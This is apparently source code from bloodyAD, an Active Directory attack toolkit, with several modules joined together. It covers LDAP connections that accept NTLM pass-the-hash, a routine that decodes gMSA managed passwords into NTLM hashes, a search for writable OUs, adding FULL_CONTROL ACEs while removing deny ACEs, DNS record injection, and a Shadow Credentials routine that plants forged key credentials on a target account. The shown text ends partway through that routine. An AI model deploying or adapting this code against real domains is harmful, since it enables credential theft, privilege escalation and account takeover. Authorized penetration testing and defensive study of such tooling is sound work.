import binascii


class DNBinary:
    """
    Object(DN-Binary) - adschema
    """

    def __init__(self, data=None):
        if not data:
            return
        data = data.decode("utf-8").split(":")
        if len(data) != 4 or data[0] != "B":
            raise TypeError("can't convert str to DN-Binary")
        self.count = int(data[1])
        self.binary_value = data[2]

        self.value = binascii.unhexlify(self.binary_value)
        self.dn = data[3]

    def fromCanonical(self, value, dn):
        self.value = value
        self.dn = dn
        self.binary_value = binascii.hexlify(value).decode()
        self.count = len(self.binary_value)

    def __str__(self):
        return f"B:{self.count}:{self.binary_value}:{self.dn}"


# see https://social.technet.microsoft.com/wiki/contents/articles/37395.active-directory-schema-versions.aspx
SCHEMA_VERSION = {
    "13": "Windows 2000 Server",
    "30": "Windows Server 2003",
    "31": "Windows Server 2003 R2",
    "44": "Windows Server 2008",
    "47": "Windows Server 2008 R2",
    "56": "Windows Server 2012",
    "69": "Windows Server 2012 R2",
    "87": "Windows Server 2016",
    "88": "Windows Server 2019/2022",
}

# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/d7422d35-448a-451a-8846-6a7def0044df?redirectedfrom=MSDN
FUNCTIONAL_LEVEL = {
    "0": "DS_BEHAVIOR_WIN2000",
    "1": "DS_BEHAVIOR_WIN2003_WITH_MIXED_DOMAINS",
    "2": "DS_BEHAVIOR_WIN2003",
    "3": "DS_BEHAVIOR_WIN2008",
    "4": "DS_BEHAVIOR_WIN2008R2",
    "5": "DS_BEHAVIOR_WIN2012",
    "6": "DS_BEHAVIOR_WIN2012R2",
    "7": "DS_BEHAVIOR_WIN2016",
}



import uuid
from functools import lru_cache

ldap_conn = None


def ldap_search(base_dn, filter, attr):
    try:
        if (
            not ldap_conn.search(base_dn, filter, attributes=attr)
            or not len(ldap_conn.entries)
            or attr not in ldap_conn.entries[0]
        ):
            return None
    except:
        return None

    return ldap_conn.entries[0][attr].value


@lru_cache
def resolveSid(sid):
    r = ldap_search(
        "CN=WellKnown Security"
        f" Principals,{ldap_conn.server.info.other['configurationNamingContext'][0]}",
        f"(objectSid={sid})",
        "name",
    )
    if r:
        return r
    r = ldap_search(
        ldap_conn.server.info.other["rootDomainNamingContext"][0],
        f"(objectSid={sid})",
        "sAMAccountName",
    )
    return r if r else sid


def resolveGUID(guid_raw):
    attr = "name"
    guid_canonical = str(uuid.UUID(bytes_le=guid_raw))
    guid_str = "\\" + "\\".join(["{:02x}".format(b) for b in guid_raw])
    schema_dn = ldap_conn.server.info.other["schemaNamingContext"][0]
    r = ldap_search(
        f"CN=Extended-Rights,{ldap_conn.server.info.other['configurationNamingContext'][0]}",
        f"(rightsGuid={guid_canonical})",
        attr,
    )
    if not r:
        r = ldap_search(schema_dn, f"(schemaIDGUID={guid_str})", attr)
        return r if r else guid_canonical
    if not ldap_conn.search(
        schema_dn, f"(attributeSecurityGUID={guid_str})", attributes=attr
    ) or not len(ldap_conn.entries):
        return r
    return {r: [entry[attr].value for entry in ldap_conn.entries]}



import bloodyAD.patch.winacl_patch
from bloodyAD.formatters import (
    accesscontrol,
    common,
    cryptography,
    dns,
    ldaptypes,
    helpers,
)
from bloodyAD import formatters
import base64
from winacl.dtyp.security_descriptor import SECURITY_DESCRIPTOR

RESOLVING = False

def formatAccountControl(userAccountControl):
    userAccountControl = int(userAccountControl.decode())
    return [
        key
        for key, val in accesscontrol.ACCOUNT_FLAGS.items()
        if userAccountControl & val == val
    ]


def formatSD(sd_bytes):
    if not RESOLVING:
        return SECURITY_DESCRIPTOR.from_bytes(sd_bytes).to_sddl()

    sd = ldaptypes.SR_SECURITY_DESCRIPTOR(data=sd_bytes)
    pretty_sd = {}
    if sd["OffsetOwner"] != 0:
        pretty_sd["Owner"] = helpers.resolveSid(sd["OwnerSid"].formatCanonical())
    if sd["OffsetGroup"] != 0:
        pretty_sd["Group"] = helpers.resolveSid(sd["GroupSid"].formatCanonical())
    if sd["OffsetSacl"] != 0:
        pretty_sd["Sacl"] = base64.b64encode(sd["Sacl"].getData())
    if sd["OffsetDacl"] != 0:
        pretty_aces = []
        for ace in sd["Dacl"].aces:
            pretty_aces.append(accesscontrol.decodeAce(ace))
        pretty_sd["Dacl"] = pretty_aces
    return pretty_sd


def formatFunctionalLevel(behavior_version):
    behavior_version = behavior_version.decode()
    return (
        common.FUNCTIONAL_LEVEL[behavior_version]
        if behavior_version in common.FUNCTIONAL_LEVEL
        else behavior_version
    )


def formatSchemaVersion(objectVersion):
    objectVersion = objectVersion.decode()
    return (
        common.SCHEMA_VERSION[objectVersion]
        if objectVersion in common.SCHEMA_VERSION
        else objectVersion
    )


def formatGMSApass(managedPassword):
    gmsa_blob = cryptography.MSDS_MANAGEDPASSWORD_BLOB(managedPassword)
    ntlm_hash = "aad3b435b51404eeaad3b435b51404ee:" + gmsa_blob.toNtHash()
    return  f"NTLM {ntlm_hash} B64ENCODED {base64.b64encode(gmsa_blob['CurrentPassword'])}"


def formatDnsRecord(dns_record):
    return dns.Record(dns_record).toDict()


def formatKeyCredentialLink(key_dnbinary):
    return cryptography.KEYCREDENTIALLINK_BLOB(
        common.DNBinary(key_dnbinary).value
    ).toString()



from bloodyAD.formatters import formatters, ldaptypes, accesscontrol
from bloodyAD.utils import LOG, getDefaultNamingContext, search, getOrganizationalUnits, getObjectSID, resolvDN
import json, logging
from functools import lru_cache
import ldap3
from ldap3.core.exceptions import LDAPNoSuchObjectResult
from ldap3.protocol.formatters.formatters import format_sid


def dnsRecord(
    conn,
    zone: str = None,
    include_tombstoned: bool = False,
    include_rootservers: bool = False,
    no_legacy: bool = False,
    no_forest: bool = False,
    no_domain: bool = False,
):
    """
    Retrieves DNS records of the Active Directory readable by the user

    :param zone: if set, prints only records in this zone
    :param include_tombstoned: if set, includes tombstoned records
    :param include_rootservers: if set, includes DNS root servers
    :param no_legacy: if set, excludes records in main partition
    :param no_forest: if set, excludes records in forest partition
    :param no_domain: if set, excludes records in domain partition
    """
    ldap_conn = conn.getLdapConnection()

    naming_context = getDefaultNamingContext(ldap_conn)
    containers = []
    container = ""
    if not no_legacy:
        container = naming_context
        if zone:
            container = f"DC={zone},CN=MicrosoftDNS,CN=System,{container}"
        containers.append(container)
    if not no_forest:
        container = f"DC=ForestDnsZones,{naming_context}"
        if zone:
            container = f"DC={zone},CN=MicrosoftDNS,{container}"
        containers.append(container)
    if not no_domain:
        container = f"DC=DomainDnsZones,{naming_context}"
        if zone:
            container = f"DC={zone},CN=MicrosoftDNS,{container}"
        containers.append(container)

    printable_entries = ""
    record_list = []
    for container_dn in containers:
        res = None
        try:
            res = search(
                conn,
                container_dn,
                ldap_filter="(objectClass=dnsNode)",
                attr=["dnsRecord", "dNSTombstoned"],
                search_scope=ldap3.SUBTREE,
            )
        except LDAPNoSuchObjectResult:
            continue

        for entry in res:
            # Ignore searchResRef entry
            if entry["type"] == "searchResRef":
                continue
            if entry["attributes"]["dNSTombstoned"] and not include_tombstoned:
                continue
            dn = entry["dn"][3:]
            hostname = ""
            skip = False
            for level in dn.split(",CN=")[0].split(",DC="):
                if level == "RootDNSServers":
                    skip = not include_rootservers
                    break
                if level == "@":
                    continue
                hostname += level + "."
            # Ignore this entry
            if skip:
                continue

            if not hostname:
                hostname = "."

            for record in entry["attributes"]["dnsRecord"]:
                printable_entries += hostname
                record_data = None
                try:
                    if record["Type"] in ["A", "AAAA", "NS", "CNAME", "PTR", "TXT"]:
                        record_data = [record["Data"], record["Type"]]
                    elif record["Type"] == "MX":
                        record_data = [record["Data"]["Name"], record["Type"]]
                    elif record["Type"] == "SRV":
                        record_data = [
                            f"{record['Data']['Target']}:{record['Data']['Port']}",
                            record["Type"],
                        ]
                    elif record["Type"] == "SOA":
                        record_data = [
                            record["Data"]["PrimaryServer"],
                            record["Data"]["zoneAdminEmail"],
                            record["Type"],
                        ]
                    else:
                        LOG.warn("[!] Record type: " + record["Type"] + " not supported yet! Raise an issue if you think it matters")
                        continue

                except KeyError:
                    LOG.error("[-] KeyError for record: " + record)
                    continue

                for data in record_data:
                    printable_entries += f" :-> {data}"
                printable_entries += "\n"
                record_list.append([hostname, record_data])

    LOG.info(printable_entries)
    return record_list


@lru_cache
def membership(
    conn,
    target: str,
    no_recurse: bool = False
):
    """
    Retrieves all groups an object belongs to

    :param target: sAMAccountName, DN, GUID or SID of the target
    :param no_recurse: list groups recursively
    """
    # We fetch primaryGroupID, since this group is not reflected in memberOf
    # Additionally we get objectSid to have the domain sid it is helpfuf
    # to resolv the primary group RID to a DN
    # Finally we had the special identity groups: Authenticated Users and Everyone

    data = search(conn, target, attr=["objectSid", "memberOf", "primaryGroupID"])
    data = data[0]["attributes"]
    groups = data["memberOf"]

    if data["primaryGroupID"]:
        domain_sid = "-".join(data["objectSid"].split("-")[:-1])
        primary_group_sid = domain_sid + "-" + str(data["primaryGroupID"])
        ldap_conn = conn.getLdapConnection()
        primary_group_dn = resolvDN(ldap_conn, primary_group_sid)
        groups.append(primary_group_dn)

    found_groups = set(groups)
    if not no_recurse:
        for group in groups:
            new_group = membership(conn, group, no_recurse)
            found_groups.update(new_group)

    groups_json = json.dumps(sorted(list(found_groups)), indent=4, sort_keys=True)
    LOG.info(groups_json)

    return found_groups


def object(
    conn,
    target: str,
    attr: str = "*",
    resolve_sd: bool = False,
    raw: bool = False
):
    """
    Retrieves LDAP attributes for the target object provided

    :param target: sAMAccountName, DN, GUID or SID of the target
    :param attr: name of the attribute to retrieve, retrieves all the attributes by default
    :param resolve_sd: if set, permissions linked to a security descriptor will be resolved !!resolving can take some time!!
    :param raw: if set, will return attributes as sent by the server without any formatting, binary data will be outputed in base64
    """

    old_resolving = formatters.RESOLVING
    if resolve_sd:
        formatters.RESOLVING = True
    
    object_res = search(conn, target, attr=attr)
    formatters.RESOLVING = old_resolving

    if raw:
        object_attributes = object_res[0]["raw_attributes"]
    else:
        # We call response_to_json because it automatically converts
        # non printable objects into JSON
        object_json = conn.getLdapConnection().response_to_json()
        # And then we remove the "entries" container unnecessary for one object/entry
        object_attributes = json.loads(object_json)["entries"][0]["attributes"]
        
    printable_object = json.dumps(object_attributes, indent=4, sort_keys=True)
    LOG.info(printable_object)

    return object_attributes


def writableOU(
    conn, 
    target: str,
    page_size: int = 1000
):
    """
    Retrieves Organizational Units writable by target

    :param target: sAMAccountName, DN, GUID or SID of the target
    :param page_size: number of OUs to fetch in each request
    """

    # Fetch group membership
    LOG.setLevel(logging.WARNING)
    groups = membership(conn, target)
    LOG.setLevel(logging.INFO)

    groups_sid = [format_sid(getObjectSID(conn, group)) for group in groups]
    groups_sid.append("S-1-5-11")
    groups_sid.append("S-1-1-0")

    # Walk the OU hierarchy
    attr = ["ntSecurityDescriptor", "distinguishedName"]
    vulnerable_ous = set()
    interesting_perms = ["FULL_CONTROL", "GENERIC_ALL", "GENERIC_WRITE", "ADS_RIGHT_DS_CREATE_CHILD"]
    for ou in getOrganizationalUnits(conn, attributes=attr, page_size=page_size):

        sd = ldaptypes.SR_SECURITY_DESCRIPTOR(data=ou["raw_attributes"]["nTSecurityDescriptor"][0])

        ownerSid = sd["OwnerSid"].formatCanonical()
        if ownerSid in groups_sid:
            LOG.info(f"owner of {ou['attributes']['distinguishedName']}")
            vulnerable_ous.update(ou['attributes']['distinguishedName'])
            continue

        for ace in sd["Dacl"]["Data"]:
            aceSid = ace["Ace"]["Sid"].formatCanonical()
            if aceSid in groups_sid:
                aceType = ace["TypeName"]
                if aceType == 'ACCESS_ALLOWED_ACE':
                    aceMask = accesscontrol.decodeAccessMask(ace["Ace"]["Mask"])
                    for perm in aceMask:
                        if perm in interesting_perms:
                            LOG.info(f"{perm} on {ou['attributes']['distinguishedName']}")
                            vulnerable_ous.update(ou['attributes']['distinguishedName'])

    return vulnerable_ous


from bloodyAD.patch import ldap3_patch
from bloodyAD.formatters import formatters
from bloodyAD.formatters.formatters import (
    formatFunctionalLevel,
    formatGMSApass,
    formatSD,
    formatSchemaVersion,
    formatAccountControl,
    formatDnsRecord,
    formatKeyCredentialLink,
)
import ssl
from dataclasses import dataclass
import ldap3


@dataclass
class Config:
    """Class for keeping all connection data for domain"""

    scheme: str = "ldap"
    host: str = ""
    domain: str = ""
    username: str = ""
    password: str = ""
    lmhash: str = "aad3b435b51404eeaad3b435b51404ee"
    nthash: str = ""
    kerberos: bool = False
    certificate: str = ""
    crt: str = ""
    key: str = ""
    url: str = ""

    def __post_init__(self):
        # Handle case where password is hashes
        if self.password and ":" in self.password:
            lmhash_maybe, nthash_maybe = self.password.split(":")
            try:
                int(nthash_maybe, 16)
            except ValueError:
                self.lmhash, self.nthash = None, None
            else:
                if len(lmhash_maybe) == 0 and len(nthash_maybe) == 32:
                    self.nthash = nthash_maybe
                    self.password = f"{self.lmhash}:{self.nthash}"
                elif len(lmhash_maybe) == 32 and len(nthash_maybe) == 32:
                    self.lmhash = lmhash_maybe
                    self.nthash = nthash_maybe
                    self.password = f"{self.lmhash}:{self.nthash}"
                else:
                    self.lmhash, self.nthash = None, None

        # Handle case where certificate is provided
        if self.certificate:
            self.key, self.crt = self.certificate.split(":")

        # Build the url from parameters given
        self.url = self.scheme + "://" + self.host


class ConnectionHandler:
    def __init__(self, args=None, config=None):
        if args:
            scheme = "ldaps" if args.secure else "ldap"
            cnf = Config(
                domain=args.domain,
                username=args.username,
                password=args.password,
                scheme=scheme,
                host=args.host,
                kerberos=args.kerberos,
                certificate=args.certificate,
            )
        else:
            cnf = config

        self.conf = cnf
        self.ldap = None

    def getLdapConnection(self):
        if not self.ldap:
            self.ldap = self._connectLDAP()
        return self.ldap

    def _connectLDAP(self):
        cnf = self.conf
        ldap_server_kwargs = {
            "host": cnf.url,
            "get_info": ldap3.ALL,
            "formatter": {
                "nTSecurityDescriptor": formatSD,
                "msDS-AllowedToActOnBehalfOfOtherIdentity": formatSD,
                "msDS-Behavior-Version": formatFunctionalLevel,
                "objectVersion": formatSchemaVersion,
                "userAccountControl": formatAccountControl,
                "msDS-ManagedPassword": formatGMSApass,
                "dnsRecord": formatDnsRecord,
                "msDS-KeyCredentialLink": formatKeyCredentialLink,
            },
        }
        ldap_connection_kwargs = {"raise_exceptions": True}

        if cnf.crt:
            key = cnf.key if cnf.key else None
            tls = ldap3.Tls(
                local_private_key_file=key,
                local_certificate_file=cnf.crt,
                validate=ssl.CERT_NONE,
            )
            ldap_server_kwargs["tls"] = tls
            if cnf.scheme != "ldaps":
                ldap_connection_kwargs.update(
                    {
                        "authentication": ldap3.SASL,
                        "sasl_mechanism": ldap3.EXTERNAL,
                        "auto_bind": ldap3.AUTO_BIND_TLS_BEFORE_BIND,
                    }
                )
        elif cnf.kerberos:
            ldap_connection_kwargs.update(
                {
                    "authentication": ldap3.SASL,
                    "sasl_mechanism": ldap3.KERBEROS,
                }
            )
            if cnf.scheme != "ldaps":
                ldap_connection_kwargs.update({"session_security": "ENCRYPT"})

        else:
            ldap_connection_kwargs.update(
                {
                    "user": "%s\\%s" % (cnf.domain, cnf.username),
                    "password": cnf.password,
                    "authentication": ldap3.NTLM,
                }
            )
            if cnf.scheme != "ldaps":
                ldap_connection_kwargs.update({"session_security": "ENCRYPT"})

        s = ldap3.Server(**ldap_server_kwargs)
        c = ldap3.Connection(s, **ldap_connection_kwargs)
        if cnf.crt and cnf.scheme == "ldaps":
            c.open()
        else:
            c.bind()

        formatters.helpers.ldap_conn = c
        return c

    def close(self):
        self._closeLdap()

    def _closeLdap(self):
        if self.ldap:
            self.ldap.unbind()
            self.ldap = None

    def switchUser(self, username, password):
        self.conf.username = username
        self.conf.password = password
        self._closeLdap()



from typing import Literal
from bloodyAD.utils import LOG, getDefaultNamingContext, search
from bloodyAD.exceptions import BloodyError
from bloodyAD.formatters import dns
from ldap3 import MODIFY_DELETE


def dnsRecord(
    conn,
    name: str,
    data: str,
    dnstype: Literal["A", "AAAA", "CNAME", "MX", "PTR", "SRV", "TXT"] = "A",
    zone: str = "CurrentDomain",
    ttl: int = None,
    preference: int = None,
    port: int = None,
    priority: int = None,
    weight: int = None,
    forest: bool = False,
):
    """
    Removes a DNS record of an AD environment.

    :param name: name of the dnsNode object (hostname) which contains the record
    :param data: DNS record data
    :param dnstype: DNS record type
    :param zone: DNS zone
    :param ttl: DNS record TTL
    :param preference: DNS MX record preference
    :param port: listening port of the service in a DNS SRV record
    :param priority: priority of a DNS SRV record against concurrent
    :param weight: weight of a DNS SRV record against concurrent
    :param forest: if set, will fetch the dns record in forest instead of domain
    """
    ldap_conn = conn.getLdapConnection()

    naming_context = "," + getDefaultNamingContext(ldap_conn)
    if zone == "CurrentDomain":
        zone = ""
        for label in naming_context.split(",DC="):
            if label:
                zone += "." + label
        if forest:
            zone = "_msdcs" + zone
        else:
            # Removes first dot
            zone = zone[1:]

    if forest:
        zone_type = "ForestDnsZones"
    else:
        zone_type = "DomainDnsZones"

    zone_dn = f",DC={zone},CN=MicrosoftDNS,DC={zone_type}{naming_context}"
    record_dn = f"DC={name}{zone_dn}"

    record_to_remove = None
    for raw_record in search(conn, record_dn, attr="dnsRecord")[0]["raw_attributes"][
        "dnsRecord"
    ]:
        record = dns.Record(raw_record)
        tmp_record = dns.Record()

        if not ttl:
            ttl = record["TtlSeconds"]
        tmp_record.fromDict(
            data,
            dnstype,
            ttl,
            record["Rank"],
            record["Serial"],
            preference,
            port,
            priority,
            weight,
        )

        if tmp_record.getData() == raw_record:
            record_to_remove = raw_record
            break

    if not record_to_remove:
        LOG.warning("[!] Record not found")
        return

    ldap_conn.modify(record_dn, {"dnsRecord": (MODIFY_DELETE, record_to_remove)})

    if ldap_conn.result["description"] == "success":
        LOG.info(f"[-] Given record has been successfully removed from {name}")
    else:
        raise BloodyError(ldap_conn.result["description"])



from typing import Literal
from bloodyAD.utils import LOG, getDefaultNamingContext, search
from bloodyAD.exceptions import BloodyError
from bloodyAD.formatters import dns
from ldap3.core.exceptions import (
    LDAPEntryAlreadyExistsResult,
    LDAPAttributeOrValueExistsResult,
)
from ldap3 import MODIFY_ADD

# Credits to Kevin Robertson and his script Invoke-DNSUpdate.ps1 from the Powermad framework
def dnsRecord(
    conn,
    name: str,
    data: str,
    dnstype: Literal["A", "AAAA", "CNAME", "MX", "PTR", "SRV", "TXT"] = "A",
    zone: str = "CurrentDomain",
    ttl: int = 300,
    preference: int = 10,
    port: int = None,
    priority: int = 10,
    weight: int = 60,
    forest: bool = False,
):
    """
    This function adds a new DNS record into an AD environment.

    :param name: name of the dnsNode object (hostname) which will contain the new record
    :param data: DNS record data, for most record types this will be the destination hostname or IP address, for TXT records this can be used for text
    :param dnstype: DNS record type
    :param zone: DNS zone
    :param ttl: DNS record TTL, time in seconds the record stays in DNS caches, must be low if you want to propagate record updates quickly
    :param preference: DNS MX record preference, must be lower than the concurrent records to be chosen
    :param port: listening port of the service in a DNS SRV record
    :param priority: priority of a DNS SRV record against concurrent, must be lower to be chosen, if identical to others, highest weight will be chosen
    :param weight: weight of a DNS SRV record against concurrent, must be higher with the lowest priority to be chosen
    :param forest: if set, registers dns record in forest instead of domain
    """
    ldap_conn = conn.getLdapConnection()

    # DNS_RPC_RECORD - section 2.2.2.2.5
    # RANK_ZONE - The record comes from an authoritative zone
    rank = 0xF0

    naming_context = "," + getDefaultNamingContext(ldap_conn)
    if zone == "CurrentDomain":
        zone = ""
        for label in naming_context.split(",DC="):
            if label:
                zone += "." + label
        if forest:
            zone = "_msdcs" + zone
        else:
            # Removes first dot
            zone = zone[1:]

    if forest:
        zone_type = "ForestDnsZones"
    else:
        zone_type = "DomainDnsZones"

    zone_dn = f",DC={zone},CN=MicrosoftDNS,DC={zone_type}{naming_context}"
    record_dn = f"DC={name}{zone_dn}"

    serial = None
    for dns_record in search(conn, f"DC=@{zone_dn}", attr="dnsRecord")[0]["attributes"][
        "dnsRecord"
    ]:
        if dns_record.get("Type") == "SOA":
            serial = dns_record["Data"]["SerialNo"]
            break

    dns_record = dns.Record()
    dns_record.fromDict(
        data, dnstype, ttl, rank, serial, preference, port, priority, weight
    )
    record_attr = {
        "objectClass": ["top", "dnsNode"],
        "dnsRecord": dns_record.getData(),
        "dNSTombstoned": False,
    }

    try:
        ldap_conn.add(record_dn, attributes=record_attr)
        success_log = f"[+] {name} has been successfully added"
    except LDAPEntryAlreadyExistsResult:
        try:
            ldap_conn.modify(
                record_dn, {"dnsRecord": (MODIFY_ADD, record_attr["dnsRecord"])}
            )
            success_log = f"[+] {name} has been successfully updated"
        except LDAPAttributeOrValueExistsResult:
            LOG.warning(f"[!] {name} has already a record of this type")
            LOG.warning("[!] Record not updated")
            return

    if ldap_conn.result["description"] == "success":
        LOG.info(success_log)
    else:
        raise BloodyError(ldap_conn.result["description"])



from bloodyAD.formatters import ldaptypes, accesscontrol, cryptography, common
from bloodyAD import formatters
from bloodyAD.exceptions import NoResultError, ResultError, TooManyResultsError
import random, string, logging, json, sys, datetime, binascii
from functools import lru_cache
import ldap3
from ldap3.protocol.formatters.formatters import format_sid
from cryptography import x509
from cryptography.x509.oid import NameOID
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import rsa


LOG = logging.getLogger("bloodyAD")
LOG.setLevel(logging.DEBUG)
handler = logging.StreamHandler(sys.stdout)
handler.setLevel(logging.DEBUG)
LOG.addHandler(handler)


def resolvDN(conn, identity, objtype=None):
    """
    Return the DN for the object based on the parameters identity
    Args:
        identity: sAMAccountName, DN, GUID or SID of the user
        objtype: None is default or GPO
    """

    if "dc=" in identity.lower():
        # identity is a DN, return as is
        # We do not try to validate it because it could be from another trusted domain
        return identity

    if "s-1-" in identity.lower():
        # We assume identity is an SID
        ldap_filter = f"(objectSid={identity})"

    elif "{" in identity:
        if objtype == "GPO":
            ldap_filter = f"(&(objectClass=groupPolicyContainer)(name={identity}))"
        else:
            # We assume identity is a GUID
            ldap_filter = f"(objectGUID={identity})"
    else:
        # By default, we assume identity is a sam account name
        ldap_filter = f"(sAMAccountName={identity})"

    naming_context = getDefaultNamingContext(conn)
    conn.search(naming_context, ldap_filter)

    entries = [e for e in conn.response if e.get("type", "") == "searchResEntry"]

    if len(entries) < 1:
        raise NoResultError(naming_context, ldap_filter)

    if len(entries) > 1:
        raise TooManyResultsError(naming_context, ldap_filter, entries)

    res = entries[0]["dn"]
    return res


def search(
    conn,
    base,
    ldap_filter="(objectClass=*)",
    search_scope=ldap3.BASE,
    attr=["*"],
    control_flag= (
        accesscontrol.OWNER_SECURITY_INFORMATION +
        accesscontrol.GROUP_SECURITY_INFORMATION +
        accesscontrol.DACL_SECURITY_INFORMATION
    )
):
    ldap_conn = conn.getLdapConnection()
    base_dn = resolvDN(ldap_conn, base)
    controls = ldap3.protocol.microsoft.security_descriptor_control(
        sdflags=control_flag
    )
    ldap_conn.search(
        base_dn,
        ldap_filter,
        search_scope=search_scope,
        attributes=attr,
        controls=controls,
    )
    if len(ldap_conn.entries) < 1:
        raise NoResultError(base_dn, ldap_filter)

    return ldap_conn.response


def setAttr(
    conn,
    identity,
    attribute,
    value,
    control_flag=accesscontrol.OWNER_SECURITY_INFORMATION,
):
    ldap_conn = conn.getLdapConnection()
    dn = resolvDN(ldap_conn, identity)
    controls = ldap3.protocol.microsoft.security_descriptor_control(
        sdflags=control_flag
    )
    ldap_conn.modify(dn, {attribute: [ldap3.MODIFY_REPLACE, value]}, controls)

    if ldap_conn.result["result"] == 0:
        LOG.debug(f"[+] {attribute} set successfully")
    else:
        raise ResultError(conn.result)


def getDefaultNamingContext(conn):
    naming_context = conn.server.info.other["defaultNamingContext"][0]
    return naming_context


def getOrganizationalUnits(conn, attributes=["*"], page_size=1000):
    """
    Iterator over the Organizational Units
    """
    ldap_conn = conn.getLdapConnection()
    naming_context = getDefaultNamingContext(ldap_conn)

    control_flag = (accesscontrol.OWNER_SECURITY_INFORMATION + 
                    accesscontrol.GROUP_SECURITY_INFORMATION + 
                    accesscontrol.DACL_SECURITY_INFORMATION)
    controls = ldap3.protocol.microsoft.security_descriptor_control(
        sdflags=control_flag
    )

    ldap_conn.search(
        search_base = naming_context,
        search_filter = '(objectClass=OrganizationalUnit)',
        search_scope = ldap3.SUBTREE,
        attributes = attributes,
        paged_size = page_size,
        controls=controls,
        )

    cookie = ldap_conn.result['controls']['1.2.840.113556.1.4.319']['value']['cookie']

    ous = [e for e in ldap_conn.response if e.get("type", "") == "searchResEntry"]

    for ou in ous:
        yield ou

    while cookie:
        ldap_conn.search(
            search_base = naming_context,
            search_filter = '(objectClass=OrganizationalUnit)',
            search_scope = ldap3.SUBTREE,
            attributes = attributes,
            paged_size = page_size,
            paged_cookie = cookie,
            controls=controls,
            )

        cookie = ldap_conn.result['controls']['1.2.840.113556.1.4.319']['value']['cookie']

        ous = [e for e in ldap_conn.response if e.get("type", "") == "searchResEntry"]
        for ou in ous:
            yield ou


@lru_cache
def getObjectSID(conn, identity):
    """
    Get the SID for the given identity
    Args:
        identity: sAMAccountName, DN, GUID or SID of the object
    """
    ldap_conn = conn.getLdapConnection()
    object_dn = resolvDN(ldap_conn, identity)
    ldap_conn.search(
        object_dn,
        "(objectClass=*)",
        search_scope=ldap3.BASE,
        attributes="objectSid",
    )
    object_sid = ldap_conn.response[0]["raw_attributes"]["objectSid"][0]
    LOG.debug(f"[*] {identity} SID is: {format_sid(object_sid)}")
    return object_sid


def getSD(
    conn,
    object_id,
    ldap_attribute="nTSecurityDescriptor",
    control_flag=accesscontrol.DACL_SECURITY_INFORMATION,
):
    entry = search(conn, object_id, attr=ldap_attribute, control_flag=control_flag)[0]
    sd_data = entry["raw_attributes"][ldap_attribute]
    if len(sd_data) < 1:
        LOG.warning(
            "[!] No security descriptor has been returned, a new one will be created"
        )
        sd = accesscontrol.createEmptySD()
    else:
        sd = ldaptypes.SR_SECURITY_DESCRIPTOR(data=sd_data[0])

    return sd, sd_data


def addRight(
    sd,
    user_sid,
    access_mask=accesscontrol.ACCESS_FLAGS["FULL_CONTROL"],
    object_type=None,
):
    user_aces = [
        ace for ace in sd["Dacl"].aces if ace["Ace"]["Sid"].getData() == user_sid
    ]
    new_ace = accesscontrol.createACE(user_sid, object_type, access_mask)
    if object_type:
        access_denied_type = ldaptypes.ACCESS_DENIED_OBJECT_ACE.ACE_TYPE
    else:
        access_denied_type = ldaptypes.ACCESS_DENIED_ACE.ACE_TYPE
    hasPriv = False

    for ace in user_aces:
        new_mask = new_ace["Ace"]["Mask"]
        mask = ace["Ace"]["Mask"]

        # Removes Access-Denied ACEs interfering
        if ace["AceType"] == access_denied_type and new_mask.hasPriv(mask["Mask"]):
            sd["Dacl"].aces.remove(ace)
            LOG.debug("[-] An interfering Access-Denied ACE has been removed:")
            LOG.info(json.dumps(accesscontrol.decodeAce(ace)))
        # Adds ACE if not already added
        elif mask.hasPriv(new_mask["Mask"]):
            hasPriv = True
            break

    if hasPriv:
        LOG.debug("[!] This right already exists")
    else:
        sd["Dacl"].aces.append(new_ace)

    isAdded = not hasPriv
    return isAdded


def delRight(
    sd,
    user_sid,
    access_mask=accesscontrol.ACCESS_FLAGS["FULL_CONTROL"],
    object_type=None,
):
    isRemoved = False
    user_aces = [
        ace for ace in sd["Dacl"].aces if ace["Ace"]["Sid"].getData() == user_sid
    ]
    if object_type:
        access_allowed_type = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ACE_TYPE
    else:
        access_allowed_type = ldaptypes.ACCESS_ALLOWED_ACE.ACE_TYPE

    for ace in user_aces:
        mask = ace["Ace"]["Mask"]
        if ace["AceType"] == access_allowed_type and mask.hasPriv(access_mask):
            mask.removePriv(access_mask)
            LOG.debug("[-] Privilege Removed")
            if mask["Mask"] == 0:
                sd["Dacl"].aces.remove(ace)
            isRemoved = True

    if not isRemoved:
        LOG.debug("[!] No right to remove")
    return isRemoved


def addShadowCredentials(conn, identity, outfilePath=None):
    """
    Allow to authenticate as the user provided using a crafted certificate (Shadow Credentials)
    Args:
        identity: sAMAccountName, DN, GUID or SID of the target (You must have write permission on it)
        outfilePath: file path for the generated certificate (default is current path)
    """
    ldap_conn = conn.getLdapConnection()
    target_dn = resolvDN(ldap_conn, identity)

    LOG.debug("Generating certificate")

    key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    issuer = x509.Name(
        [
            x509.NameAttribute(NameOID.COMMON_NAME, target_dn),
        ]
    )
    cert = (
        x509.CertificateBuilder()
        .subject_name(issuer)
        .issuer_name(issuer)
        .serial_number(x509.random_serial_number())
        .public_key(key.public_key())
        .not_valid_before(datetime.datetime.utcnow())
        .not_valid_after(datetime.datetime.utcnow() + datetime.timedelta(days=365))
        .sign(key, hashes.SHA256())
    )

    LOG.debug("Certificate generated")
    LOG.debug("Generating KeyCredential")

    keyCredential = cryptography.KEYCREDENTIALLINK_BLOB()
    keyCredential.keyCredentialLink_from_x509(cert)

    LOG.info(
        "[+] KeyCredential generated with following sha256 of RSA key: %s"
        % binascii.hexlify(keyCredential.getKeyID()).decode()
    )

    ldap_conn.search(
        target_dn,
        "(objectClass=*)",
        search_scope=ldap3.BASE,
        attributes=["msDS-KeyCredentialLink"],
    )

    key_dnbinary = common.DNBinary()
    key_dnbinary.fromCanonical(keyCredential.getData(), target_dn)
    new_values = ldap_conn.response[0]["raw_attributes"]["msDS-KeyCredentialLink"] + [
        str(key_dnbinary)
    ]

    LOG.debug("[*] Updating the msDS-KeyCredentialLink attribute of %s" % identity)

    ldap_conn.modify(
        target_dn,
        {"msDS-KeyCredentialLink": [ldap3.MODIFY_REPLACE, new_values]},
    )

    if ldap_conn.result["result"] == 0:
        LOG.debug("[+] msDS-KeyCredentialLink attribute of the target object updated")
        if outfilePath is None:
            path = "".join(
                random.choice(string.ascii_letters + string.digits) for i in range(8)
            )
            LOG.info(
                "No outfile path was provided. The certificate(s) will be"
                " stored with the filename: %s" % path
            )
        else:
            path = outfilePath

